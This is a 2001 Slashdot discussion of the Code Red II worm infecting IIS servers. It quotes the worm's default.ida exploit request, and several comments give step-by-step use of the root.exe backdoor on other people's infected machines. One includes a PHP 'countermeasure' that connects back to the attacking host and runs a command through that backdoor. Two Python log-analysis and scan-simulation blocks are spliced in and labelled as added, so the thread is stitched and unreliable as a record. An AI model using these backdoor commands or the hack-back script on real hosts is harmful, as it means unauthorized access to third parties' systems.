    From this thread on Ars Technica:
    Just discovered something interesting...
    telnet 80

    type GET /scripts/root.exe HTTP/1.0

    and you have a command prompt..

    Like this:
    [root@server httpd]# telnet 24.xxx.xxx.xxx 80
    Trying 24.xxx.xxx.xxx...
    Connected to 24.xxx.xxx.xxx.
    Escape character is '^]'.
    GET /scripts/root.exe HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 07:45:08 GMT
    Content-Type: application/octet-stream
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-1999 Microsoft Corp.

    c:\inetpub\scripts>

    [This message was edited by The_Hitman on August 05, 2001 at 03:56.]



    --
    "Depression is merely anger without enthusiasm." - Anonymous
  55. Re:Server 403's by Cato · · Score: 2

    A couple of possibilities:

    - the infected servers are just DoSed by the number of people scanning them back on a small connection

    - IIS is actually running on WinNT/2K Workstation, which has a limit of something like 10 concurrent inbound TCP connections (exacerbated by HTTP/1.1, used by most browsers these days).

  56. CRII root opening new ports? by RatOmeter · · Score: 2, Informative

    I'm gonna check the "well-known numbers" RFC, but
    I did a little scan of one of the infectoids:
    Ports open at:
    21
    25 (open mail relay too!)
    80
    135
    139
    443
    445
    1025
    1027
    2057
    2162
    2174
    2200
    2210
    2214
    2219
    2227
    2228
    2257
    2282

    I recognize some of those ports, but surely
    windows doesn't need all those ports open?

  57. Re:URM. Thjs is NOT good. GG Microsoft by nyet · · Score: 2

    If somebody had deep linked versions of these via ftp, we could write a white hat worm easily.

    Anybody have ftp deep link equivalents of:
    http://download.microsoft.com/download/winntsp/Patch/q300972/NT4/EN-US/Q300972i.exe

    Writing a worm to wget those would be a bitch, but ftp comes installed on all NT boxen... so it's easy

    and

    http://download.microsoft.com/download/win2000platform/Patch/q300972/NT5/EN-US/Q300972_W2K_SP3_x86_en.EXE

  58. Re:Why is PWS (IIS 4) on Windows 98 not vulnerable by baptiste · · Score: 2
    Actually, from what I've read, CodeRedII will only infect on Win2K. From the analysis email on BUGTRAQ:

    This worm, like the original Code Red worm, will only exploit Windows 2000 web servers because it overwrites EIP with a jmp that is only correct under Windows 2000. Under NT4.0 etc... that offset is different so, the process will simply crash instead of allowing the worm to infect the system and spread.

    But I'm sure someone will create various flavors with the right jump points to hit all the IIS variants. Only a matter of time.

  59. The request by ConsumedByTV · · Score: 2, Redundant
    Here is the request I was hit with:

    "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0"


    So does this do anything differently?
    --


    "Not my manner of thinking but the manner of thinking of others has been the source of my unhappiness." - M
    1. Re:The request by ConsumedByTV · · Score: 2

      I just put up a request sent to my webserver. Not a virus. After all, it's an HTTP GET request. Microsoft is the one that made it into a virus!

      --


      "Not my manner of thinking but the manner of thinking of others has been the source of my unhappiness." - M
  60. Code Red - the soda pop - sales take off! by MyMomIsALinuxHacker · · Score: 3, Funny

    Taken from http://www.securitynewsportal.com/article.php?sid=1354&mode=thread&order=0

    Code Red--the soda--has been spreading almost as fast as its namesake computer worm, which has infected hundreds of thousands of computers to date. The caffeine-laden, cherry-flavored version of its pale-yellow cousin, Mountain Dew, was released in May, months before the Code Red worm threatened to clog Internet traffic. And as computer security experts work to contain the damage from the Code Red worm, the soda's maker, Pepsi, is coincidentally featuring a "Crack the Code" contest on the Mountain Dew Web site.

    Code Red has been an especially big hit with computer programmers, who often guzzle the high-octane drink to fuel late-night code-writing sessions. Among the drink's fans were the staff of eEye Digital Security, who say they identified the Code Red worm and named it after their favorite soda.

    The rest of the story can be found on http://www.securitynewsportal.com/article.php?sid=1354&mode=thread&order=0 .

    Its funny. Laugh. Please?

  61. Re:Something that should happen more often. by Tackhead · · Score: 3, Funny
    > Man, I'm glad that I'm not using [Microsoft Product]. This new [virus/worm/trojan] exploits a [flaw/bug/backdoor] in [Microsoft Product], and it [does/doesn't] use Outlook and the stupidity of users. Luckily, I'm running [Free alternative to Microsoft product], so I'm not at risk. In fact, [Free alternative to Microsoft product] has protected me from [any integer over 200] [viruses/worms/trojans]. And just look at the [hundreds/thousands/millions/billions] of dollars that I've saved using [Free alternative to Microsoft product]. I hope that this [Free alternative to Microsoft product] takes off, along with [free alternative to Microsoft OS]. Unfortunately, my [company/home] has to pay for the stupidity of Microsoft: this [virus/worm/trojan] sucked [250KB/250MB/250GB/250TB] of bandwidth!

    I hereby propose we adopt your post as a convention.

    We can thus encode "war stories" about the latest [worm/virus/trojan] as follows, saving Slashdot a fortune in bandwidth charges.

    For instance, I can now describe my evening as follows:

    "IIS. Code Red II. flaw. IIS. doesn't. FreeBSD. 429. worms. thousands. Apache. Apache. FreeBSD. company. worm. 6.2MB."

  62. Re:a quick fix by Malcontent · · Score: 2

    "So after the last 20 root exploits of Linux and Apache, we shouldn't use that either?"

    Of course you shouldn't, especially if they happened within a short period of time. Why would you use any insecure system? If Linux and Apache got rooted as much as IIS, you can bet your ass I'd drop it like a hot potato and move on to something else. There must be a thousand web servers out there, both open source and commercial; anybody who willingly uses an insecure one is just plain stupid at best and criminally negligent at worst.

    --

    War is necrophilia.

  63. PHP countermeasure by l-ascorbic · · Score: 3, Informative

    On the basis of that, this should work. I'll watch the logs with interest.

    <?php
    // Answer the probe with an error so the worm gets nothing useful back.
    header("HTTP/1.0 400 You cheeky fucker");
    ?>
    <html>
    <title>Red Alert</title>
    <?php
    // Read the client address from $_SERVER rather than relying on register_globals.
    $remote = $_SERVER['REMOTE_ADDR'];
    $res = '';
    // Connect back to the attacker's own IIS on port 80, 5-second timeout.
    $fp = fsockopen($remote, 80, $en, $es, 5);
    if (!$fp)
    {
        echo "I tried to disinfect you, but couldn't connect: $es ($en)";
    }
    else
    {
        // Use the worm's root.exe backdoor to rename that copy out of the way.
        // (The worm drops a second copy under msadc; this only handles /scripts.)
        fputs($fp, "GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0\r\n\r\n");
        echo "I tried to disinfect you, and the server started to say:<h2>";
        echo $res = fgets($fp, 1024);
        fclose($fp);
    }
    // Append one line per probe: source address, timestamp, first response line.
    $log = fopen("/tmp/redalert.log", "a");
    fwrite($log, $remote . " " . date("r") . " " . rtrim($res) . "\n");
    fclose($log);
    echo "</h2> " . $_SERVER['SERVER_SIGNATURE'];
    ?>

  64. Worse than that...any loser has ALL hosts by braddock · · Score: 2, Interesting
    It's worse than that. I can use the backdoor on the few hosts I am being hit directly with, and get THEIR web logs. If I have 100 hosts that have attacked me, and each of THEM have 100 hosts that have tried to reinfect THEM, etc....

    100*100 = 10,000
    100*100*100 = 1,000,000 (250,000 is probably the total number of hosts that will be infected, so you'll start getting diminishing returns as you get duplicates)

  65. Re:What are you talking about? by jonathan_ingram · · Score: 3, Interesting

    Why do you call this pattern bizarre? That's how I'd scan if I wrote a worm: if you manage to infect a computer at a particular IP adress, then you have some evidence that computers 'close' to that one will probably be vulnerable as well, so you attempt to infect 'close' computers more than 'distant' ones.

    You keep trying the 'distant' ones every now and then, just in case you get lucky.

  66. Re:Something that should happen more often. by IKEA-Boy · · Score: 2, Informative

    While this is a remote exploit, it's not nearly as severe as the default.ida one on IIS. The apache exploit can be used to gather directory listings etc. and does NOT allow arbitrary code to run.

  67. Re:Free r00t for all! by Malcontent · · Score: 2

    "Now that they have the backdoors, though, how hard would it be to patch them remotely?"

    Why bother? can't you think of more interesting things to do with their computer?

    --

    War is necrophilia.

  68. Re:Proposal for White Hat'ing CR][ by Spoing · · Score: 2
    Suggestion to any White-hat hackers thinking of making a 'Code Green' worm/patch;

    1. Make the patch obnoxious and embarrass the slacking admins. Write a file or program that points out that the rest of the world is getting angry that they aren't doing a minimum to secure their own systems. Put the message in the About...Windows box, put it in a message that pauses the system on boot, put it on the desktop(s), put it on the Start menu somewhere.

    I'm sick of this shit. If I weren't a Libertarian, I'd be for licencing admins before they can play on the Internet. Even without MS code on my servers, I still pay for their shoddy work.

    --
    A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
  69. Re:Now that is funny! by sdo1 · · Score: 2, Funny
    Right now this dude is looking at his server logs and thinking "Awesome! I can't believe how many people are pumped about my resume! Job offers are going to be ROLLING in any second!"

    -S

    --
    --- What parts of "shall make no law", "shall not be infringed", and "shall not be violated" don't you understand?
  70. Re:Ooops bad paste. Take two. by cyberdonny · · Score: 2
    Found it:

    > telnet x.x.x.x 80
    Trying x.x.x.x...
    Connected to x.x.x.x.
    Escape character is '^]'.
    GET /scripts/root.exe?/c+dir HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 09:35:11 GMT
    Content-Type: application/octet-stream
    Volume in drive D has no label.
    Volume Serial Number is A8A2-CE97

    Directory of d:\inetpub\scripts

    2001-06-03 04:12a <DIR> .
    2001-06-03 04:12a <DIR> ..
    2001-06-13 09:07a 289 default.asp
    2001-06-13 09:07a 289 default.htm
    2001-06-13 09:07a 289 index.asp
    2001-06-13 09:07a 289 index.htm
    2000-01-10 09:00p 310,544 root.exe
    5 File(s) 311,700 bytes
    2 Dir(s) 353,468,416 bytes free
    Connection closed by foreign host.

  71. Re:C:\dos C:\dos\run | run\dos\run by Eeeeegon · · Score: 4, Informative

    This worm is combining TWO worms; both the Code Red worm we know and love, and the less-recent SANDMIND worm (sp?), famous for running DOS commands and posting an anti-US webpage at 'default.asp', 'default.html', 'index.asp', and 'index.html' on directories relative to the website root. Apparently this worm is using 'cmd.exe' to get root access; what it does beyond that, I have no idea... I haven't been hit by it. I guess the logic is .... if the box isn't patched against Code Red, chances are it isn't patched against SANDMIND, too.

    Also, 90% of the 'NNNN's in my server logs came from my Class A subnet (and much more frequently than the 'XXXXX' requests).

    Logs available upon request, etc.
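The requests quoted in this thread (the XXXX-padded default.ida line posted above, the NNNN variant the poster here contrasts it with, and the root.exe?/c+... backdoor calls shown in the telnet transcripts) are easy to tell apart in an Apache log if you parse the request line rather than grep for "ida". The following is an added example, not code from any poster: it classifies each request as original Code Red (N padding), Code Red II (X padding), or post-infection use of the root.exe/cmd.exe backdoor, decodes the command in the latter case, and reports the "how much of it came from my Class A" figure several posters are quoting. The log lines are constructed for the example; the IP addresses in them are made up.

```python
import ipaddress
import re
from collections import Counter, defaultdict
from urllib.parse import unquote, urlsplit

# Added example. Apache common/combined log prefix; only these fields are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>\S+))?" (?P<status>\d{3})'
)
# root.exe is the worm's renamed cmd.exe (dropped under /scripts and /msadc,
# per the thread); a raw cmd.exe path is the older Unicode-traversal style.
BACKDOOR_RE = re.compile(r'/(?:root|cmd)\.exe$', re.IGNORECASE)
# Code Red v1/v2 pad the query with N, Code Red II with X.
PAD_RE = re.compile(r'([NX])\1*')

# Shellcode tail as it appears in the request quoted in this thread.
SHELLCODE_TAIL = ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858"
                  "%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff"
                  "%u0078%u0000%u00=a")

# Constructed sample log (not real data): one CRII probe, one CRv1/v2 probe,
# two backdoor commands from one source, and one ordinary request.
SAMPLE_LOG = [
    f'24.0.0.17 - - [05/Aug/2001:03:12:44 -0400] "GET /default.ida?{"X" * 224}{SHELLCODE_TAIL} HTTP/1.0" 404 287',
    f'24.0.3.9 - - [05/Aug/2001:03:13:01 -0400] "GET /default.ida?{"N" * 224}{SHELLCODE_TAIL} HTTP/1.0" 404 287',
    '10.1.2.3 - - [05/Aug/2001:03:14:10 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276',
    '10.1.2.3 - - [05/Aug/2001:03:14:12 -0400] "GET /msadc/root.exe?/c+net+stop+%22World+Wide+Web+Publishing+Service%22 HTTP/1.0" 404 276',
    '192.0.2.8 - - [05/Aug/2001:03:15:00 -0400] "GET /index.html HTTP/1.1" 200 1043',
]


def classify_request(method, target):
    """Return (kind, detail) for one request, or None if it is not Code Red related.

    kind:   'codered-v1v2' (N padding), 'codered-ii' (X padding),
            'ida-probe' (other /default.ida traffic), 'backdoor-cmd' (root.exe/cmd.exe use).
    detail: padding length for .ida hits, decoded command for backdoor use.
    """
    parts = urlsplit(target)
    path = parts.path.lower()
    if path == "/default.ida":
        m = PAD_RE.match(parts.query)
        if m is None:
            return ("ida-probe", 0)
        kind = "codered-v1v2" if m.group(1) == "N" else "codered-ii"
        return (kind, m.end())
    if BACKDOOR_RE.search(path):
        # '+' is a space in a query string; %XX escapes cover the rest.
        return ("backdoor-cmd", unquote(parts.query.replace("+", " ")))
    return None


def summarize(lines):
    """Tally hits per source IP by kind and collect backdoor commands for review."""
    tally = defaultdict(Counter)
    commands = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line we understand
        hit = classify_request(m["method"], m["target"])
        if hit is None:
            continue
        kind, detail = hit
        tally[m["ip"]][kind] += 1
        if kind == "backdoor-cmd":
            commands.append((m["ip"], detail))
    return tally, commands


def same_prefix_share(ips, my_ip, bits):
    """Fraction of source IPs sharing the top `bits` of my_ip (bits=8 is the 'Class A' figure)."""
    if not ips:
        return 0.0
    net = ipaddress.ip_network(f"{my_ip}/{bits}", strict=False)
    return sum(ipaddress.IPv4Address(ip) in net for ip in ips) / len(ips)


if __name__ == "__main__":
    tally, commands = summarize(SAMPLE_LOG)
    for ip, kinds in sorted(tally.items()):
        print(ip, dict(kinds))
    for ip, cmd in commands:
        print("backdoor use from", ip, ":", cmd)
    print("share from my Class A:", same_prefix_share(list(tally), "24.5.6.7", 8))
```

The backdoor commands are the lines to look at first: a root.exe hit against your server means someone has already compromised a host and is now probing others through it, which is what the "any loser has all hosts" post below is worried about.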

  72. The end is near... by TrevorB · · Score: 3, Insightful

    So let me get this straight... Every machine on the planet practically has a list of infected IP addresses broadcasted to them, with a new one arriving every minute or so (up to 663 XXX's here in the past two hours).

    So that means any loser with this list of infected IPs and some knowledge of perl literally has a small army of computers at their command?

    I think we might be seeing some rather impressive DDoS attacks by this evening.

    Hmm.. 3 more XXX's in the time it took me to write this... frequency's increasing...

  73. Re:A few more details:It's a root trojan by Drone-X · · Score: 3, Informative
    I found that you must do "GET /scripts/root.exe" without the HTTP/1.0 for it to work.

    Oh yeah, since you can't enter commands at the prompt you need to pass the commands to execute as arguments to root.exe (which is really cmd.exe). You can do this by typing "GET /scripts/root.exe?/C%20dir" or something like that. Or you could enter http://somehost/scripts/root.exe?/C%20dir into your favourite browser.

    I've found that typing absolute paths doesn't work for some reason, but http://somehost/scripts/root.exe?/C%20dir%20"..\.. \Documents%20and%20Settings\All%20Users\Desktop\" (remove the spaces) should bring you to the desktop.

    I wanted to leave a message to the admin on the desktop but I have no idea how to do that since "echo" is part of cmd.exe and piping probably won't work too. Perhaps someone with WinNT skills could offer some ideas?

  74. Server 403's by nebby · · Score: 2

    I've noticed that a lot of the infected servers are 403'ing me ("Too Many Connected Users") so I'm guessing that once our Chinese (or, for you conspiracy theorists, Microsoft employee) buddies get their stuff setup on their 0wned boxes they turn IIS to allow one connection only or something to block everyone else besides them out.

    The obvious conclusion is that they're setting up for a DoS or something. Sucks to be the target they should choose.. 100,000 UDP packet sources anyone? Eerk.

    --
    --
  75. IIS is installed by default in Win2k by Phrogman · · Score: 2

    If you are installing Win2k server on a box, you get IIS by default - and its enabled. You have to actually go and disable it. This is probably the biggest problem, in that every copy of Win2k server installed on any box is also a webserver. What do you want to design badly today?

    --
    "The first time I got drunk, I got married. The second time I bought a chimpanzee, after that I stayed sober" Arian Seid
    1. Re:IIS is installed by default in Win2k by mpe · · Score: 2

      If you are installing Win2k server on a box, you get IIS by default - and its enabled. You have to actually go and disable it.

      Even if you disable it, even that's not the end of it. You have to make sure it stays disabled. Which means checking every time you install software or change which "Windows Components" you have.

  76. Re:Something that should happen more often. by spectecjr · · Score: 2

    Let's count the number of remote exploits for apache and IIS and decide which system is more secure

    A pity that this won't actually give you any kind of realistic indication as to how insecure they actually are.

    To do that you'd also need to know how many attempts to find exploits on each were made. It's more likely that Apache just hasn't been hammered on as much.

    Simon

    --
    Coming soon - pyrogyra
  77. Re:There's been stacks of Unix worms this year by Nailer · · Score: 2

    RWXS is not what I call a permission system, and if it is, it's a very coarse-grained system, certainly not usable on an everyday file server. And yes I'm serious. Imagine templates for a word processor. A group needs to read and write them. A group needs to read them. All other users must not have access. Can't do it with rwxs, and most Unix shops don't (they use Windows and Netware for file servers).

    Windows users get to choose between an actual VMS / Trusted Nix style permission system or nothing at all. That's choice.

    Most services can be chrooted, but they're not. The FHS doesn't even care about chrooted services - they should be standard. Most services don't need root privileges (yay capabilities), but they use them.

    I prefer Linux over Windows for my own work, but for others, the best tool for the job is Windows.

  78. @home preventative measures by WereTiger · · Score: 4, Informative

    Apparently @home is monitoring its customers for Code Red.
    I'd JUST reinstalled Win2k Pro on a new system, I'd added IIS for my own purposes and before I had a chance to run the service pack and patch, I got the Code Red worm (ok, so I was lazy and tired and was going to leave it for the morning)

    @home unbound my cablemodem until I'd cleared the worm (disable IIS, reboot).

    normally, I'd be a little annoyed at @home for monitoring my connection and cutting my connection rather than just block all traffic to that IP at router level. but hey, it saved me from contributing to a problem.

    --
    If you're hearing rhetoric about Linux, open source, or Mac and everyone's bashing Microsoft, you've found Slashdot.
    1. Re:@home preventative measures by cybrthng · · Score: 4, Interesting
      You sure you just didn't dos yourself of the net? :)

      Personally i don't see @Home taking you off and noticing you fixed it and putting you back online.

      Check your outage listings for your area.

  79. Re:it really is heavy in 24.*.*.* by cworley · · Score: 2

    The strange thing is the flood of ARP "who-has" requests.

    I'm on 24... too, and my activity light is blinking like my son's running a gnutella client (but he's not), and tcpdump is showing a flood of arp "who-has" packets... for a couple hours now.

    My bandwidth seems good... in fact, better than normal... probably because I don't do WinDoh's.

    --
    When I die, please cast my ashes upon Bill Gates -- for once, make him clean up after me!
  80. Re:Hypothesis by Saint+Aardvark · · Score: 2

    Holiday weekend here in Canada...one more day of this. Oh boy.

  81. Re:test by tulare · · Score: 2

    Err... looks like I forgot to close the tag. D'oh!

    --
    political_news.c: warning: comparison is always true due to limited range of data type
  82. What are you talking about? by whatnotever · · Score: 4, Insightful

    "Code red algorithm"??? It's called a random ip scan. In this variation, it's called a scan of the local subnet with a random ip thrown in every now and then. There's nothing special about it.

    It's fast because that's how exponential growth works.

    1. Re:What are you talking about? by baptiste · · Score: 2

      By bizarre, I meant the way it appeared in the logs. You're right, this is a big improvement over the original worm and helped this worm spread faster.

    2. Re:What are you talking about? by baptiste · · Score: 4, Informative
      Steve Friedl believes he has figured out the bizarre scanning of the new strain. From DSLReports forums:

      OK, I know how the scanning works now. The worm starts with the user's IP address, and then adds a variable number of random octets. Let's say that our web server is on 192.168.1.7:

      • One time out of eight, an entirely random IP address is generated
      • Four times out of eight, the lower octet of the IP address is randomized (192.168.1.X)
      • Three times out of eight, the lower two octets are randomized (192.168.X.Y)

      This is entirely consistent with the patterns we've been seeing, so if somebody on your local network gets infected, you're gonna get pounded until they fix it.

      Another point: if the web server in question is behind a NAT firewall, it will go nuts scanning the internal network. For a large company that has many NT systems internally, they will spend all day trying to infect each other.

      What a worm.

      Steve
      --
      Stephen J. Friedl / Software Consultant / Tustin, California USA / www.unixwiz.net

      Looks like somebody did their homework and decided to really make Code Red nasty
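The scan mix quoted above from Steve Friedl (and the dispersal-strategy musing in sunhou's post earlier in the thread, which works from the same three bullets) can be made concrete with a small target generator. This is an added example, not code from either post or from the worm itself: the prefix/probability mix is a parameter, so the same code also models the Class A / Class B bias that other posts in this thread describe (1/8 random, 4/8 same /8, 3/8 same /16). It draws targets, buckets them by how much prefix they share with the infected host, and computes the exact per-probe chance of hitting a given neighbour. Addresses and seeds are made up.

```python
import ipaddress
import random
from collections import Counter

# Added example: scan mixes as (weight, prefix bits preserved).
# FRIEDL_MIX follows the post above: 1/8 entirely random, 4/8 keep the first
# three octets (a.b.c.RAND), 3/8 keep the first two (a.b.RAND.RAND).
# CLASS_AB_MIX is the same shape with the Class A / Class B bias other posts
# in this thread report (1/8 random, 4/8 same /8, 3/8 same /16).
FRIEDL_MIX = ((1, 0), (4, 24), (3, 16))
CLASS_AB_MIX = ((1, 0), (4, 8), (3, 16))
ALL_ONES = 0xFFFFFFFF


def _mask(keep_bits):
    """Netmask, as an int, covering the top keep_bits of an IPv4 address."""
    return (ALL_ONES << (32 - keep_bits)) & ALL_ONES if keep_bits else 0


def randomize_low_bits(own_ip, keep_bits, rand32):
    """Keep the top keep_bits of own_ip and fill the remaining bits from rand32."""
    own = int(ipaddress.IPv4Address(own_ip))
    mask = _mask(keep_bits)
    low = rand32 & (~mask & ALL_ONES)
    return str(ipaddress.IPv4Address((own & mask) | low))


def next_target(own_ip, rng, mix=FRIEDL_MIX):
    """Draw one scan target: choose a strategy by weight, then randomize the low bits."""
    keep = rng.choices([bits for _, bits in mix], weights=[w for w, _ in mix], k=1)[0]
    return randomize_low_bits(own_ip, keep, rng.getrandbits(32))


def locality_histogram(own_ip, n, rng, mix=FRIEDL_MIX):
    """Bucket n targets by the longest prefix (/24, /16, /8, none) shared with own_ip."""
    own = ipaddress.IPv4Address(own_ip)
    nets = [(f"same /{bits}", ipaddress.ip_network(f"{own}/{bits}", strict=False))
            for bits in (24, 16, 8)]
    counts = Counter()
    for _ in range(n):
        target = ipaddress.IPv4Address(next_target(own_ip, rng, mix))
        for label, net in nets:
            if target in net:
                counts[label] += 1
                break
        else:
            counts["elsewhere"] += 1
    return counts


def simulate(own_ip, n, seed, mix=FRIEDL_MIX):
    """Reproducible wrapper around locality_histogram for a given seed."""
    return locality_histogram(own_ip, n, random.Random(seed), mix)


def hit_probability(own_ip, victim_ip, mix=FRIEDL_MIX):
    """Exact probability that a single probe from own_ip lands on victim_ip.

    A strategy keeping k prefix bits can only reach victims sharing those bits,
    and then spreads its probes uniformly over the 2**(32-k) remaining addresses.
    """
    own = int(ipaddress.IPv4Address(own_ip))
    victim = int(ipaddress.IPv4Address(victim_ip))
    total = sum(w for w, _ in mix)
    p = 0.0
    for w, bits in mix:
        mask = _mask(bits)
        if (own & mask) == (victim & mask):
            p += (w / total) / 2 ** (32 - bits)
    return p


if __name__ == "__main__":
    for name, mix in (("Friedl", FRIEDL_MIX), ("Class A/B", CLASS_AB_MIX)):
        print(name, dict(simulate("192.168.1.7", 8000, 2001, mix)))
    # A neighbour in the same /24 versus a random host elsewhere on the net.
    print(hit_probability("192.168.1.7", "192.168.1.200"),
          hit_probability("192.168.1.7", "10.0.0.1"))
```

With the Friedl mix, a host in the same /24 as an infected machine is hit by roughly one probe in 500, a host in the same /16 by about one in 170,000, and everyone else at the 1-in-2^35 rate of the random branch; that ratio is the "you're gonna get pounded until they fix it" effect in numbers, and the NAT remark in the post follows from it, since an RFC 1918 address keeps its low-bit neighbours private.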

  83. Re:Free r00t for all! by Malcontent · · Score: 2

    You really think that your average windows luser moron will actually put two and two together? Come now get real. They will probably just hit the home button so they can go to MSN and catch up with the latest Britney Spears news.

    --

    War is necrophilia.

  84. Autorespond with a $250 consulting fee by IvyMike · · Score: 2

    This variant installs a backdoor. Whenever you're attacked, your host should automatically respond by telnetting into the back door, installing the MS IIS patch, and send the sysadmin a $250 'consulting fee' for fixing their server. (This is slightly different than the oft-suggested "why not making a patching worm?")

    Back on a serious note: How long will it be before someone starts suing the owners for letting their computer be a platform for an attack? Not long, I fear. I guess we'll see a huge upsurge in linux and apache installations when that day comes, though.

  85. Re:Something that should happen more often. by MajroMax · · Score: 2, Funny

    Man, I'm glad that I'm not using Minesweeper. This new virus exploits an unexploded mine in Minesweeper, and it does use Outlook and the stupidity of users. Luckily, I'm running OpenMine, so I'm not at risk. In fact, OpenMine has protected me from 2^37-302 virii. And just look at the millions of dollars that I've saved using OpenMine. I hope that this OpenMine takes off, along with OS/2. Unfortunately, my doghouse has to pay for the stupidity of Microsoft: this virus sucked 212 nibbles of bandwidth!

    --
    "Evil company X is threatening to restrict our rights! Let's all get together to stop--OOOH! SHINEY!!!" -- AC
  86. Re:This web page was changed... by Saint+Aardvark · · Score: 2
    ARGHHH.

    grep ida /foo/bar/log | awk '{print $1}' | sort | uniq |\
    awk '{print "<a href=\"http://" $1 "\">" $1 "</a><br>"}'

  87. I don't see a problem by KidSock · · Score: 2


    Aug 5 00:04:13 nano kernel: Packet log: input DENY ppp0 PROTO=6 204.172.72.112:4474 208.162.198.38:80 L=48 S=0x00 I=56830 F=0x4000 T=119 SYN (#19)

  88. Re:POSTing to root.exe? by chabotc · · Score: 2

    Yes, quite easy actually, the line to get a directory listing would be: GET /scripts/root.exe?/c+dir HTTP/1.0

  89. My range... by heliocentric · · Score: 2, Funny

    Well, with everyone feeling the need to chime in about what ranges they see like we did when we were taking bets if school would be canceled, I just felt like saying:

    Nothing from the 192.168.0.x range here!!

    =)

    --
    Wheeeee
  90. It's certainly more ambitious... by David+E.+Smith · · Score: 2
    I just pulled out the logs from the home Web server on a 24.x.x.x cable modem (which never really does anything but redirect people to my real Web server). The original tried to attack my Apache web server about a dozen times over three days; this one, over the past four days, has tried over 200 attacks.

    1. Re:It's certainly more ambitious... by David+E.+Smith · · Score: 2
      Nope, it's definitely getting worse. Another 15 hits in the past hour (since I put up a l'il script to log them separately, and to attempt to email the responsible parties).

      Something that should perhaps be part of another thread: For each attack, I'm now sending out one email, to [webmaster && postmaster]@[domain]. Is this actually a good/ethical idea? Under the circumstances, I'm hoping it won't be interpreted as spam. The text of the email is, roughly:

      From: (my email address)
      To: (as above)
      Subject: You are afflicted with Code Red or a variant!

      Your machine, at IP address (blah), appears to be infected with the Code Red virus. Information on how to fix this system vulnerability is at (url that I don't remember right now).
      Thank you.
      ...dave

    2. Re:It's certainly more ambitious... by baptiste · · Score: 2
      Well, many organizations are doing this automagically. All they want is your logs.

      DShield has a system setup. Just execute this command if you run Apache in your log directory:

      grep 'default.ida' access_log* | mail -s 'APACHE' redalert@dshield.org

      This way they can identify all the compromised hosts and contact the owners.

      The ARIS team @ SecurityFocus is doing something similar

    3. Re:It's certainly more ambitious... by nathanm · · Score: 2

      I've had the opposite experience. I got over 60 hits in the first round of the Code Red worm, and 32 from this round tonight.

  91. Re:Why don't they... by tswinzig · · Score: 5, Funny

    Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...

    Nah, this will just make the sysadmins even lazier.

    SysAdmin #1: Dude, your NT machines are all infected with Code Red!

    SysAdmin #2: I know! I'm just waiting for for them to be infected with the fix... should be any day now...

    --

    "And like that ... he's gone."
  92. Gotta love Zone Alarm... by Bonker · · Score: 2

    Of course, I'd never run IIS on my workstation, let alone a server, but it's fun to watch the HTTP requests come in on ZA.

    Now, let's see if ZA logs contain enough information to determine if it's a Code Red attack or just another port scanner....

    --
    The next Slashdot story will be ready soon, but subscribers can beat the rush and slashdot the links early!
  93. Breakdown of the new "features" of CRII by 2675636B20796F75 · · Score: 5, Informative
    Ok, here's the latest on this new variant.

    1. It makes a copy of CMD.EXE called ROOT.EXE in the

    \inetpub\scripts

    and

    \program files\common files\system\msadc

    directories. Does this on both drive C: and D: (doesn't fail if D: doesn't exist).

    2. It then runs its attack program code to infect itself upon numerous other boxes. This is done randomly, although there is a bias to attack boxes that are part of the same class A as infected attacker (so it hits your own boxes sooner rather than later). Attack code runs for 24 hours, 48 hours on Chinese language systems.

    3. After attack code runs (and it seems to be based on clock ticks, not date), it then writes out a Trojan.

    File Explorer.exe (8192 bytes, or 7K as displayed by Windows) is dropped (from the code in the original attacking URL) to the root of drive C: and D: (again, doesn't matter if D: doesn't exist).

    4. The system is then rebooted (probably a forced reboot).

    5. When the system restarts, it loads the trojan Explorer.exe from the root directory on the boot drive. This code then does several things;

    a) Launches the real Explorer.exe, so the system looks normal.

    b) Sets SFCDisable in hklm\software\microsoft\windows nt\currentversion\winlogon to some undocumented value. Presumably this disables Windows File Protection (so critical files could be overwritten)

    c) Creates two virtual directories (via the registry) in hklm\system\currentcontrolset\services\w3svc\parameters\virtual roots. Called "C" and "D", they are mapped to the root directories of the two drives and permissions are established in the virtual directory to allow script, read, and write access as well as setting execute permissions to scripts and executables.

    d) goes into an endless sleep loop.

    The end result of all of this action is to leave your box wide open to remote connection and total compromise.

    Unlike "Code Red", this worm doesn't attack any single target at any point, although its attack strength seems to be much higher (it launches 300 threads right off, although some may only launch 100), so its propagation seems much higher.

    The attack only works properly on Windows 2000 systems (preliminary analysis). ICSA Labs tested against an NT 4.0/IIS 4.0/SP3 box and received a standard error message. Reports from subscribers suggest that XP IIS 5.1 RC1 is invulnerable also. It's expected that it works on PWS and OWS equally to IIS (all on W2K).

    It's obviously a short-lived attack, at least the process of collecting victims. What would be done with them once collected is another story. No attempt is made by the worm to send anything "home", although detecting compromised boxes is far too easy (very unfortunately) for anyone outside your network.

